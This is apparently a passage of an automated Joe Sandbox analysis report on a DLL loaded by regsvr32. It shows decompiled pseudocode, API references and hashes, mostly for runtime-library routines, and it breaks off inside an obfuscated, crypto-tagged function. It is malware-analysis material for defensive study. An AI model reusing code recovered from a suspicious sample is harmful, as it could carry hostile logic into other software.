Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: f6e28b48059995ca29912a95c28a827f2a61a1c9dd0fc06b2d0b42f95d4636a5
Instruction ID: 8d4bdb4428b7acf9e0102c20b712a123a89dd13be302a812f16ea2bbf7404400
Opcode Fuzzy Hash: f6e28b48059995ca29912a95c28a827f2a61a1c9dd0fc06b2d0b42f95d4636a5
Instruction Fuzzy Hash: 27F0B43694C741CFE720EB78870175D73A0BF42B19F1A451AD690A76E0CF78A9D2CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA584CB Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6DA584CB(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t9;

				_t13 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x6da85b80;
					if( *0x6da85b80 == 0) {
						_t5 = GetTickCount();
						 *0x6da85b80 =  *0x6da85b80 + 1;
						__eflags =  *0x6da85b80;
						 *0x6da825e8 = _t5;
					}
					_t4 = GetTickCount() -  *0x6da825e8;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x6da825e8 = _t4;
					}
					return _t4;
				}
				return E6DA5846F(_t7, _t8, _t9, _t13, _a8);
			}

0x6da584d0
0x6da584d4
0x6da584e0
0x6da584ee
0x6da584f0
0x6da584f2
0x6da584f2
0x6da584f8
0x6da584f8
0x6da584ff
0x6da58505
0x6da5850a
0x6da5850c
0x6da58512
0x6da58514
0x6da58514
0x00000000
0x6da58519
0x00000000

APIs

GetTickCount.KERNEL32 ref: 6DA584F0
GetTickCount.KERNEL32 ref: 6DA584FD
CoFreeUnusedLibraries.OLE32 ref: 6DA5850C
GetTickCount.KERNEL32 ref: 6DA58512

Part of subcall function 6DA5846F: CoFreeUnusedLibraries.OLE32 ref: 6DA584B7
Part of subcall function 6DA5846F: OleUninitialize.OLE32 ref: 6DA584BD

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: 4915a8f75afd4ce4940e03057516bae989e95110dbe6080d81254d3cb2c171c4
Instruction ID: 45e7fe2147db32eafba5588c6cc7a606931051fe168f839a9d2badff6d3f75db
Opcode Fuzzy Hash: 4915a8f75afd4ce4940e03057516bae989e95110dbe6080d81254d3cb2c171c4
Instruction Fuzzy Hash: B9E0393882C318CBEB15AFB4C8587743BB4FB07366F94C022DD4682150D77458E2CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5095B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E6DA5095B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t75;
				intOrPtr _t86;
				intOrPtr* _t103;
				signed int _t105;
				signed int _t107;
				signed int _t109;
				signed int _t117;
				intOrPtr* _t142;
				void* _t144;
				void* _t145;
				signed int* _t147;

				_push(0x70);
				E6DA5C80D(E6DA6EC78, __ebx, __edi, __esi);
				_t144 = __ecx;
				_t75 =  *(__ecx + 0x50);
				_t117 = 0;
				_t147 = _t75;
				_t120 = 0 | _t147 == 0x00000000;
				if(_t147 == 0) {
					L1:
					_t75 = E6DA44898(_t120);
				}
				_push(_t145 - 0x10);
				_push(0x6da793a8);
				 *(_t145 - 0x10) = _t117;
				_t120 =  *_t75;
				_push(_t75);
				 *(_t145 - 0x14) = _t117;
				if( *( *_t75)() >= 0) {
					if((0 |  *(_t145 - 0x10) != _t117) == _t117) {
						goto L1;
					} else {
						 *((intOrPtr*)(_t145 - 0x78)) = _t144 + 0xc8;
						 *((intOrPtr*)(_t145 - 0x70)) = _t144 + 0xd8;
						 *((intOrPtr*)(_t145 - 0x6c)) = _t144 + 0xdc;
						 *((intOrPtr*)(_t145 - 0x7c)) = 0x40;
						 *(_t145 - 0x74) = _t117;
						 *(_t145 - 0x58) = _t117;
						 *(_t145 - 0x4c) = _t117;
						 *(_t145 - 0x48) = _t117;
						E6DA4BCB2(_t145 - 0x24);
						_t86 =  *((intOrPtr*)(_t144 + 0x20));
						 *(_t145 - 4) = _t117;
						if(_t86 == _t117) {
							goto L1;
						} else {
							_t142 =  *((intOrPtr*)(_t86 + 0x20));
							 *(_t145 - 0x68) = _t117;
							if(_t142 == _t117) {
								goto L1;
							} else {
								do {
									_t27 = _t117 + 0x6da73b50; // 0xfffffd3b
									 *((intOrPtr*)( *_t142 + 0x10c))(_t144,  *_t27, _t145 - 0x24);
									if( *((short*)(_t145 - 0x1c)) != 0) {
										_t30 = _t117 + 0x6da73b54; // 0x4
										 *(_t145 - 0x68) =  *(_t145 - 0x68) |  *_t30;
									}
									_t117 = _t117 + 8;
								} while (_t117 < 0x40);
								 *((intOrPtr*)( *_t142 + 0x10c))(_t144, 0xfffffd40, _t145 - 0x24);
								 *((intOrPtr*)(_t145 - 0x64)) =  *((intOrPtr*)(_t145 - 0x1c));
								 *((intOrPtr*)( *_t142 + 0x10c))(_t144, 0xfffffd43, _t145 - 0x24);
								 *((intOrPtr*)(_t145 - 0x60)) =  *((intOrPtr*)(_t145 - 0x1c));
								 *((intOrPtr*)( *_t142 + 0x10c))(_t144, 0xfffffd34, _t145 - 0x24);
								 *((intOrPtr*)(_t145 - 0x54)) =  *((short*)(_t145 - 0x1c));
								 *((intOrPtr*)( *_t142 + 0x10c))(_t144, 0xfffffd3f, _t145 - 0x24);
								 *((intOrPtr*)(_t145 - 0x50)) =  *((intOrPtr*)(_t145 - 0x1c));
								 *((intOrPtr*)( *_t142 + 0x10c))(_t144, 0xfffffd41, _t145 - 0x24);
								_t103 =  *((intOrPtr*)(_t145 - 0x1c));
								_push(_t145 - 0x5c);
								_push(0x6da79358);
								_push(_t103);
								if( *((intOrPtr*)( *_t103))() < 0) {
									 *(_t145 - 0x5c) =  *(_t145 - 0x5c) & 0x00000000;
								}
								_t105 =  *(_t145 - 0x10);
								_push(_t145 - 0x3c);
								_push(_t145 - 0x7c);
								 *((intOrPtr*)(_t145 - 0x3c)) = 0x18;
								_push(_t105);
								if( *((intOrPtr*)( *_t105 + 0xc))() >= 0) {
									 *((intOrPtr*)(_t144 + 0x70)) =  *((intOrPtr*)(_t145 - 0x38));
									 *((intOrPtr*)(_t144 + 0x60)) =  *((intOrPtr*)(_t145 - 0x30));
									 *((intOrPtr*)(_t144 + 0x64)) =  *((intOrPtr*)(_t145 - 0x2c));
									 *(_t145 - 0x14) = 1;
								}
								_t107 =  *(_t145 - 0x10);
								 *((intOrPtr*)( *_t107 + 8))(_t107);
								_t109 =  *(_t145 - 0x5c);
								if(_t109 != 0) {
									 *((intOrPtr*)( *_t109 + 8))(_t109);
								}
								__imp__#9(_t145 - 0x24);
							}
						}
					}
				}
				return E6DA5C8E5( *(_t145 - 0x14));
			}

0x6da5095b
0x6da50962
0x6da50967
0x6da50969
0x6da5096e
0x6da50970
0x6da50972
0x6da50977
0x6da50979
0x6da50979
0x6da50979
0x6da50981
0x6da50982
0x6da50987
0x6da5098a
0x6da5098c
0x6da5098d
0x6da50994
0x6da509a4
0x00000000
0x6da509a6
0x6da509ac
0x6da509b5
0x6da509be
0x6da509c5
0x6da509cc
0x6da509cf
0x6da509d2
0x6da509d5
0x6da509d8
0x6da509dd
0x6da509e0
0x6da509e5
0x00000000
0x6da509e7
0x6da509e7
0x6da509ea
0x6da509ef
0x00000000
0x6da509f1
0x6da509f1
0x6da509f7
0x6da50a00
0x6da50a0b
0x6da50a0d
0x6da50a13
0x6da50a13
0x6da50a16
0x6da50a19
0x6da50a2c
0x6da50a3e
0x6da50a46
0x6da50a58
0x6da50a60
0x6da50a73
0x6da50a7b
0x6da50a8d
0x6da50a95
0x6da50a9b
0x6da50aa3
0x6da50aa4
0x6da50aa9
0x6da50aae
0x6da50ab0
0x6da50ab0
0x6da50ab4
0x6da50aba
0x6da50abe
0x6da50abf
0x6da50ac8
0x6da50ace
0x6da50ad3
0x6da50ad9
0x6da50adf
0x6da50ae2
0x6da50ae2
0x6da50ae9
0x6da50aef
0x6da50af2
0x6da50af7
0x6da50afc
0x6da50afc
0x6da50b03
0x6da50b03
0x6da509ef
0x6da509e5
0x6da509a4
0x6da50b11

APIs

__EH_prolog3.LIBCMT ref: 6DA50962

Part of subcall function 6DA44898: __CxxThrowException@8.LIBCMT ref: 6DA448AE

VariantClear.OLEAUT32(?), ref: 6DA50B03

Strings

@, xrefs: 6DA509C5

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ClearException@8H_prolog3ThrowVariant
String ID: @
API String ID: 2674903915-2766056989
Opcode ID: b5c81ad5422e0d19692f87fcd9ca2648329a2f4db5c3b1f16158b172c57769ce
Instruction ID: 64c8d3a3234ea756b8180f2950d2942ef7afea65562ac66ff9c23224ae7024bf
Opcode Fuzzy Hash: b5c81ad5422e0d19692f87fcd9ca2648329a2f4db5c3b1f16158b172c57769ce
Instruction Fuzzy Hash: 4451077490420A9FDB04CFA5C888AEEB7F8FF49304F14456EE555EB250E774A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA466BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6DA466BA(void* __ecx) {
				signed int _v8;
				char _v20;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				long _t12;
				intOrPtr _t13;
				intOrPtr _t19;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t29;
				signed int _t34;

				_t32 = _t34;
				_t9 =  *0x6da82744; // 0x616b45bb
				_v8 = _t9 ^ _t34;
				_t12 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t12 == 0) {
					L4:
					_t13 = 0;
					__eflags = 0;
				} else {
					_t38 = _t12 - 0x104;
					if(_t12 == 0x104) {
						goto L4;
					} else {
						 *(PathFindExtensionA( &_v280)) = 0;
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_t13 = E6DA4644B(_t19,  &_v20, "%s%s.dll", _t38,  &_v20,  &_v280);
						_t25 = _t25;
					}
				}
				_pop(_t29);
				return E6DA59DE2(_t13, _t19, _v8 ^ _t32, _t24, _t25, _t29);
			}

0x6da466bd
0x6da466c5
0x6da466cc
0x6da466e2
0x6da466ea
0x6da4671f
0x6da4671f
0x6da4671f
0x6da466ec
0x6da466ec
0x6da466ee
0x00000000
0x6da466f0
0x6da466fe
0x6da46709
0x6da46710
0x6da46716
0x6da46717
0x6da4671c
0x6da4671c
0x6da466ee
0x6da46726
0x6da4672d

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 6DA466E2
PathFindExtensionA.SHLWAPI(?), ref: 6DA466F8

Part of subcall function 6DA4644B: __EH_prolog3_GS.LIBCMT ref: 6DA46455
Part of subcall function 6DA4644B: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,6DA4671C,?,?), ref: 6DA46485
Part of subcall function 6DA4644B: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6DA46499
Part of subcall function 6DA4644B: ConvertDefaultLocale.KERNEL32(?), ref: 6DA464D5
Part of subcall function 6DA4644B: ConvertDefaultLocale.KERNEL32(?), ref: 6DA464E3
Part of subcall function 6DA4644B: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6DA46500
Part of subcall function 6DA4644B: ConvertDefaultLocale.KERNEL32(?), ref: 6DA4652B
Part of subcall function 6DA4644B: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6DA46534
Part of subcall function 6DA4644B: GetModuleFileNameA.KERNEL32(6DA20000,?,00000105), ref: 6DA465E9

Strings

%s%s.dll, xrefs: 6DA46701

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 14171bb39d7deee8fffe2f3a1e0d8f916d6c1e8c0326067b5288deb7db06be84
Instruction ID: 5b03dce98d6d5cf028290ae9a0f8cea92f390b66e01ac29f07afb91619974471
Opcode Fuzzy Hash: 14171bb39d7deee8fffe2f3a1e0d8f916d6c1e8c0326067b5288deb7db06be84
Instruction Fuzzy Hash: B901817290821C9FCB14DB68CD45BEB77FCAB46700F0544A5E601E7240EB709A858BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA49D6F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DA49D6F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				void* __esi;
				signed int _t7;
				signed int _t16;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t24;
				struct HWND__* _t25;
				signed int _t26;

				_t24 = __edi;
				_t23 = __edx;
				_t18 = __ebx;
				_t7 =  *0x6da82744; // 0x616b45bb
				_v8 = _t7 ^ _t26;
				_t25 = _a4;
				if(_t25 != 0) {
					if((GetWindowLongA(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
						goto L1;
					} else {
						GetClassNameA(_t25,  &_v20, 0xa);
						_t16 = E6DA3F221( &_v20, "combobox");
						asm("sbb eax, eax");
						_t11 =  ~_t16 + 1;
					}
				} else {
					L1:
					_t11 = 0;
				}
				return E6DA59DE2(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x6da49d6f
0x6da49d6f
0x6da49d6f
0x6da49d77
0x6da49d7e
0x6da49d82
0x6da49d87
0x6da49d9c
0x00000000
0x6da49d9e
0x6da49da5
0x6da49db4
0x6da49dbc
0x6da49dbf
0x6da49dbf
0x6da49d89
0x6da49d89
0x6da49d89
0x6da49d89
0x6da49dcc

APIs

GetWindowLongA.USER32(?,000000F0), ref: 6DA49D90
GetClassNameA.USER32(?,?,0000000A), ref: 6DA49DA5

Strings

combobox, xrefs: 6DA49DAE

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ClassLongNameWindow
String ID: combobox
API String ID: 1147815241-2240613097
Opcode ID: a5b9b4b126dc822c29c1b8da8dd2c963701a93b364e1bc4641684f607a9b058c
Instruction ID: 5f0442e9e42980f5ac3aaf241ed36fdd23f9164f4f4870ff336b1419945f4ccb
Opcode Fuzzy Hash: a5b9b4b126dc822c29c1b8da8dd2c963701a93b364e1bc4641684f607a9b058c
Instruction Fuzzy Hash: 5AF09037A1D229AB8B01DFA4CE44EBE73B8FB06324B158519E962E7180DB30E5528695

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5EBCE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E6DA5EBCE(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E6DA59D30(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E6DA5F6C8(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E6DA5F6C8(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E6DA59D09(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E6DA5E966(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x6da5ebce
0x6da5ebce
0x6da5ebce
0x6da5ebce
0x6da5ebce
0x6da5ebd1
0x6da5ebd7
0x6da5ebe5
0x6da5ebeb
0x6da5ebf3
0x6da5ebff
0x6da5ec07
0x6da5ec0f
0x6da5ec23
0x6da5ec25
0x6da5ec29
0x6da5ec2e
0x6da5ec34
0x6da5ec36
0x6da5ec38
0x6da5ec3b
0x00000000
0x6da5ec42
0x6da5ec36
0x6da5ec29
0x6da5ec23
0x6da5ec0f
0x6da5ec43

APIs

Part of subcall function 6DA59D30: __getptd.LIBCMT ref: 6DA59D36
Part of subcall function 6DA59D30: __getptd.LIBCMT ref: 6DA59D46

__getptd.LIBCMT ref: 6DA5EBDD

Part of subcall function 6DA5F6C8: __getptd_noexit.LIBCMT ref: 6DA5F6CB
Part of subcall function 6DA5F6C8: __amsg_exit.LIBCMT ref: 6DA5F6D8

__getptd.LIBCMT ref: 6DA5EBEB

Strings

csm, xrefs: 6DA5EBF9

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 8cf652e23b19f5d26341f90098d8aa9a25631dd2d49cebf766ce893d1bbf2f28
Instruction ID: fb9d158313407a38976c1a8582ef352f8447ff47bf3d0c0e2cdac230ff639cc2
Opcode Fuzzy Hash: 8cf652e23b19f5d26341f90098d8aa9a25631dd2d49cebf766ce893d1bbf2f28
Instruction Fuzzy Hash: 3A016D3980D606CECB288F24D5406ADB3F5BF40212F68482ED050EA660DB30DBE1CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA49B8E Relevance: 5.0, APIs: 4, Instructions: 38
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA49B8E(signed int _a4) {
				void* __ebp;
				struct _CRITICAL_SECTION* _t4;
				void* _t8;
				signed int _t9;
				intOrPtr* _t12;

				_t9 = _a4;
				if(_t9 >= 0x11) {
					_t4 = E6DA44898(_t8);
				}
				if( *0x6da858d8 == 0) {
					_t4 = E6DA49B6A();
				}
				_t12 = 0x6da85a90 + _t9 * 4;
				if( *_t12 == 0) {
					EnterCriticalSection(0x6da85a78);
					if( *_t12 == 0) {
						_t4 = 0x6da858e0 + _t9 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t12 =  *_t12 + 1;
					}
					LeaveCriticalSection(0x6da85a78);
				}
				EnterCriticalSection(0x6da858e0 + _t9 * 0x18);
				return _t4;
			}

0x6da49b96
0x6da49b9c
0x6da49b9e
0x6da49b9e
0x6da49baa
0x6da49bac
0x6da49bac
0x6da49bb7
0x6da49bc1
0x6da49bc8
0x6da49bcd
0x6da49bd4
0x6da49bda
0x6da49be0
0x6da49be0
0x6da49be7
0x6da49be7
0x6da49bf7
0x6da49bfd

APIs

EnterCriticalSection.KERNEL32(6DA85A78,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BC8
InitializeCriticalSection.KERNEL32(-6DA858E0,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BDA
LeaveCriticalSection.KERNEL32(6DA85A78,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BE7
EnterCriticalSection.KERNEL32(-6DA858E0,?,?,?,?,6DA4A0F5,00000010,00000008,6DA4987C,6DA4981F,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA49BF7

Part of subcall function 6DA44898: __CxxThrowException@8.LIBCMT ref: 6DA448AE

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
String ID:
API String ID: 3253506028-0
Opcode ID: b2dedd52faed09b7c5055228c7d4cce9939f077bd636391758fefaea81b3e432
Instruction ID: 8678c06b112ff6cdb6d0c440c23d74ee002df77cb2b5320a6e115a00f3b7b9c2
Opcode Fuzzy Hash: b2dedd52faed09b7c5055228c7d4cce9939f077bd636391758fefaea81b3e432
Instruction Fuzzy Hash: FFF0F63710C2169FCB001E5ACEC8B29F7BDFBC3356F56842AE94142042CB7094D3CAAA

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4A06E Relevance: 5.0, APIs: 4, Instructions: 35
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA4A06E(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x6da85b4c
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

0x6da4a075
0x6da4a078
0x6da4a078
0x6da4a07c
0x6da4a082
0x6da4a087
0x6da4a0b0
0x6da4a0b1
0x00000000
0x6da4a0b7
0x6da4a089
0x6da4a08c
0x00000000
0x00000000
0x6da4a090
0x6da4a098
0x00000000
0x6da4a09f
0x6da4a0a6
0x00000000
0x6da4a0ac

APIs

EnterCriticalSection.KERNEL32(6DA85B4C,?,?,?,?,6DA4A557,?,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030,00000000), ref: 6DA4A07C
TlsGetValue.KERNEL32 ref: 6DA4A090
LeaveCriticalSection.KERNEL32(6DA85B4C,?,?,?,?,6DA4A557,?,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030,00000000), ref: 6DA4A0A6
LeaveCriticalSection.KERNEL32(6DA85B4C,?,?,?,?,6DA4A557,?,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030,00000000), ref: 6DA4A0B1

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 253518e6d3c177cb6f7a424b08bd59f8edb677b2c5845ad6a8f934ebf7b89105
Instruction ID: f4903b663e47b33f67edbb52fc5a59f39ece3891bb1293bb6fbc6e543595b96f
Opcode Fuzzy Hash: 253518e6d3c177cb6f7a424b08bd59f8edb677b2c5845ad6a8f934ebf7b89105
Instruction Fuzzy Hash: C8F0BB3B14C2149FD7109FA5D984E0677FAEBC5366306C425E60183215CB31F8418AD6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 2236, Parent PID: 2092COMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1055
Total number of Limit Nodes:	16

Executed Functions

Function 1000F1D5 Relevance: 1.6, APIs: 1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E1000F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E10009E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
